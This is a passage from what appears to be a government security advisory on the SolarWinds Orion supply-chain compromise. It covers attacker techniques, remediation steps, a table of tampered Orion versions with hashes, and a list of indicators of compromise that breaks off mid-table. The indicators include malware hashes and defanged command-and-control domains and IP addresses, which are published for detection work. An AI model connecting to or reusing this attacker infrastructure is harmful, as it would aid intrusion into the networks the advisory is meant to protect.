href="https://attack.mitre.org/versions/v8/techniques/T1083/">T1083</a>]</li> <li><em>Ingress Tool Transfer</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1105/">T1105</a>]</li> <li><em>Data Encoding: Standard Encoding</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1132/001">T1132.001</a>]</li> <li><em>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1195/001">T1195.001</a>]</li> <li><em>Supply Chain Compromise: Compromise Software Supply Chain</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1195/002">T1195.002</a>]</li> <li><em>Software Discovery </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1518/">T1518</a>]</li> <li><em>Software Discovery: Security Software </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1518/001">T1518.001</a>]</li> <li><em>Create or Modify System Process: Windows Service</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1543/003">T1543.003</a>]</li> <li><em>Subvert Trust Controls: Code Signing</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1553/002">T1553.002</a>]</li> <li><em>Dynamic Resolution: Domain Generation Algorithms</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1568/002">T1568.002</a>]</li> <li><em>System Services: Service Execution</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1569/002">T1569.002</a>]</li> <li><em>Compromise Infrastructure</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1584/">T1584</a>]</li> </ul> <h3>Mitigations</h3><h4>SolarWinds Orion Owners</h4> <p>Owners of vulnerable SolarWinds Orion products will generally fall into one of three categories.</p> <ul> <li>Category 1 includes those who do not have the identified malicious binary. These owners can patch their systems and resume use as determined by and consistent with their internal risk evaluations.</li> <li>Category 2 includes those who have identified the presence of the malicious binary—with or without beaconing to <code>avsvmcloud[.]com</code>. Owners with malicious binary whose vulnerable appliances only unexplained external communications are with <code>avsvmcloud[.]com</code>—a fact that can be verified by comprehensive network monitoring for the device—can harden the device, re-install the updated software from a verified software supply chain, and resume use as determined by and consistent with a thorough risk evaluation.</li> <li>Category 3 includes those with the binary beaconing to <code>avsvmcloud[.]com</code> and secondary C2 activity to a separate domain or IP address. If you observed communications with <code>avsvmcloud[.]com</code> that appear to suddenly cease prior to December 14, 2020— not due to an action taken by your network defenders—you fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately.</li> </ul> <h4>Compromise Mitigations</h4> <p>If the adversary has compromised administrative level credentials in an environment—or if organizations identify SAML abuse in the environment, simply mitigating individual issues, systems, servers, or specific user accounts will likely not lead to the adversary’s removal from the network. In such cases, organizations should consider the entire identity trust store as compromised. In the event of a total identity compromise, a full reconstitution of identity and trust services is required to successfully remediate. In this reconstitution, it bears repeating that this threat actor is among the most capable, and in many cases, a full rebuild of the environment is the safest action.</p> <h4>SolarWinds Orion Specific Mitigations</h4> <p>The following mitigations apply to networks using the SolarWinds Orion product. This includes any information system that is used by an entity or operated on its behalf.</p> <p>Organizations that have the <a href="https://cyber.dhs.gov/ed/21-01/#what-does-the-directive-mean-by-expertise">expertise</a> to take the actions in Step 1 immediately should do so before proceeding to Step 2. Organizations without this capability should proceed to Step 2. Federal civilian executive branch agencies should ignore the below and refer instead to <a href="https://cyber.dhs.gov/ed/21-01/">Emergency Directive 21-01</a> (and forthcoming associated guidance) for mitigation steps.</p> <ul> <li><strong>Step 1</strong> <ul> <li><strong>Forensically image system memory and/or host operating systems hosting all instances of affected versions of SolarWinds Orion.</strong> Analyze for new user or service accounts, privileged or otherwise.</li> <li>Analyze stored network traffic for <a href="https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software">indications of compromise</a>, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections.</li> </ul> </li> <li><strong>Step 2</strong> <ul> <li>Affected organizations should immediately <strong>disconnect or power down affected all instances of affected versions of SolarWinds Orion from their network</strong>.</li> <li>Additionally: <ul> <li><strong>Block all traffic</strong> to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed.</li> <li><strong>Identify and remove </strong>all threat actor-controlled accounts and identified persistence mechanisms. &nbsp;</li> </ul> </li> </ul> </li> <li><strong>Step 3 &nbsp;</strong> <ul> <li><strong>Only after all known threat actor-controlled accounts and persistence mechanisms have been removed:</strong> <ul> <li>Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that the threat actor has deployed further persistence mechanisms.</li> <li>Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources.</li> <li>Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised.</li> <li>Take actions to remediate kerberoasting, including—as necessary or appropriate—engaging with a third party with experience eradicating APTs from enterprise networks. For Windows environments, refer to the following Microsoft’s documentation on kerberoasting: <a href="https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448">https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448</a>.</li> <li>Require use of multi-factor authentication. If not possible, use long and complex passwords (greater than 25 characters) for service principal accounts, and implement a good rotation policy for these passwords.</li> <li>Replace the user account by group Managed Service Account (gMSA), and implement Group Managed Service Accounts: <a href="https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview">https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview</a>.</li> <li>Set account options for service accounts to support <code>AES256_CTS_HMAC_SHA1_96</code> and not support <code>DES</code>, <code>RC4</code>, or <code>AES128</code> bit encryption.</li> <li>Define the Security Policy setting for Network Security: Configure Encryption types allowed for Kerberos. Set the allowable encryption types to <code>AES256_HMAC_SHA1</code> and Future encryption types: <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos">https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos</a>.</li> <li>See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket password twice: <a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password</a>.</li> </ul> </li> </ul> </li> </ul> <p>See Joint Alert on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> for more information on incident investigation and mitigation steps based on best practices.</p> <p>CISA will update this Alert, as information becomes available and will continue to provide technical assistance, upon request, to affected entities as they work to identify and mitigate potential compromises.</p> <h3>Contact Information</h3><p>CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at</p> <ul> <li>1-888-282-0870 (From outside the United States: +1-703-235-8832)</li> <li><a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">central@cisa.dhs.gov </a>(UNCLASS)</li> <li>us-cert@dhs.sgov.gov (SIPRNET)</li> <li>us-cert@dhs.ic.gov (JWICS)</li> </ul> <p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <a href="http://www.us-cert.cisa.gov/">http://www.us-cert.cisa.gov/</a>.</p> <h3>Appendix A: Affected SolarWinds Orion Products</h3> <p>Table 1 identifies recent versions of SolarWinds Orion Platforms and indicates whether they have been identified as having the Sunburst backdoor present.</p> <p class="text-align-center"><em>Table 1: Affected SolarWinds Orion Products</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 980.233px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 108px;"><strong>Orion Platform Version</strong></th> <th scope="col" style="width: 138px;"><strong>Sunburst Backdoor Code Present</strong></th> <th scope="col" style="width: 170px;"><strong>File Version</strong></th> <th scope="col" style="width: 573px;"><strong>SHA-256</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4</td> <td scope="col" style="text-align: left; width: 138px;">Tampered but not backdoored</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.8890</td> <td scope="col" style="text-align: left; width: 573px;">a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF1</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.8950</td> <td scope="col" style="text-align: left; width: 573px;"> <p>9bee4af53a8cdd7ecabe5d0c77b6011abe887ac516a5a22ad51a058830403690</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF2</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2019.4.5200.8996</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">bb86f66d11592e3312cd03423b754f7337aeebba9204f54b745ed3821de6252d</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF3</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9001</td> <td scope="col" style="text-align: left; width: 573px;">ae6694fd12679891d95b427444466f186bcdcc79bc0627b590e0cb40de1928ad</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF4</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9045</td> <td scope="col" style="text-align: left; width: 573px;"> <p>9d6285db647e7eeabdb85b409fad61467de1655098fec2e25aeb7770299e9fee</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2 RC1</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.100.12219</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;"> <p>dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF5</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9083</td> <td scope="col" style="text-align: left; width: 573px;">32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2 RC2</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.5200.12394</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;"> <p>2020.2</p> <p>2020.2 HF1</p> </td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.5300.12432</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF6</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9106</td> <td scope="col" style="text-align: left; width: 573px;">8dfe613b00d495fb8905bdf6e1317d3e3ac1f63a626032fa2bdad4750887ee8a</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;"> <p>2020.2.1</p> <p><br /> 2020.2.1 HF1</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;"> <p>&nbsp;&nbsp;&nbsp; 2020.2.15300.12766</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">143632672dcb6ef324343739636b984f5c52ece0e078cfee7c6cac4a3545403a</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2.1 HF2</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2020.2.15300.12901</td> <td scope="col" style="text-align: left; width: 573px;"> <p>cc870c07eeb672ab33b6c2be51b173ad5564af5d98bfc02da02367a9e349a76f</p> <p>&nbsp;</p> </td> </tr> </tbody> </table> <p>&nbsp;</p> <h3>Appendix B: Indicators of Compromise</h3> <p>Due to the operational security posture of the adversary, most observable IOCs are of limited utility; however, they can be useful for quick triage. Below is a compilation of IOCs from a variety of public sources provided for convenience. CISA will be updating this list with CISA developed IOCs as our investigations evolve.</p> <p class="text-align-center"><em>Table 2: Indicators of Compromise</em></p> <table border="1" cellpadding="10" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 546px;"> <p><strong>&nbsp;IOC&nbsp;</strong></p> </th> <th scope="col" style="width: 52px;">&nbsp;Type&nbsp;</th> <th scope="col" style="width: 114px;">&nbsp;Notes&nbsp;</th> <th scope="col" style="width: 400px;">&nbsp;References&nbsp;</th> <th scope="col" style="width: 757px;">&nbsp;Source&nbsp;</th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77&nbsp;</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash&nbsp;</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;Backdoor.Sunburst&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"> <p><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/&nbsp;</a></p> </td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"> <p><strong>&nbsp;a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc</strong></p> </td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;Backdoor.Sunburst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-&nbsp;&nbsp; attacks/ </a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;">&nbsp;<strong>d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;Backdoor.Sunburst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;">&nbsp;<strong>13.59.205[.]66</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;DEFTSECURITY[.]com</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;deftsecurity[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">Domain malicious on VT, registered with&nbsp; Amazon, hosted on US IP address 13.59.205.66, malware repository, spyware and malware</td> <td scope="col" style="width: 400px; text-align: left;"> <p><a href="https://www.virustotal.com/gui/domain/deftsecurity.com/details">https://www.virustotal.com/gui/domain/deftsecurity.com/details</a></p> <p><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></p> </td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;54.193.127[.]66</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">FREESCANONLINE[.]com</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;65.153.203[.]68</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Not seen as malicious on VT, Registered in USCenturyLink Communications, LLC</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.hybrid-analysis.com/sample/12e76c16bbf64e83b79d8dac921c9cccabbe40d28ad480c636f94a5737b77c9a?environmentId=100">https://www.hybrid-analysis.com/sample/12e76c16bbf64e83b79d8dac921c9cccabbe40d28ad480c636f94a5737b77c9a?environmentId=100</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;avsvmcloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">Reported by FireEye/ The malicious DLL calls out to a remote network infrastructure using the domains avsvmcloud.com. to prepare possible second-stage payloads, move laterally in the organization, and compromise or exfiltrate data. Malicious on VT. Hosted on IP address 20.140.0.1, which is registered with Microsoft.&nbsp; malware callhome, command and control</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;"> <p><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></p> <p>FireEye Report Talos</p> <p>Volexity</p> </td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;3.87.182[.]149</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Resolves to KUBECLOUD[.]com, IP registered to Amazon. Tracked by Insikt/RF as tied to SUNBURST intrusion activity.</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;3.16.81[.]254</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Resolves to SEOBUNDLEKIT[.]com, registered to Amazon. Tracked by Insikt/RF as tied SUNBURST intrusion activity.</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;12.227.230[.]4</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Seen as malicious on VT, Registered in US, AT&amp;T Services, Inc</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.hybrid-analysis.com/sample/8d34b366f4561ca1389ce2403f918e952584a56ea55876311cfb5d2aad875439">https://www.hybrid-analysis.com/sample/8d34b366f4561ca1389ce2403f918e952584a56ea55876311cfb5d2aad875439</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;54.215.192[.]52</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">THEDOCCLOUD[.]com</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">Trojan.MSIL.SunBurst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">ttps://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">Trojan.MSIL.SunBurst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://us-cert.cisa.gov https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ ">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]11</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]12</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]9</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]20</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]40</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]44</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]62</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 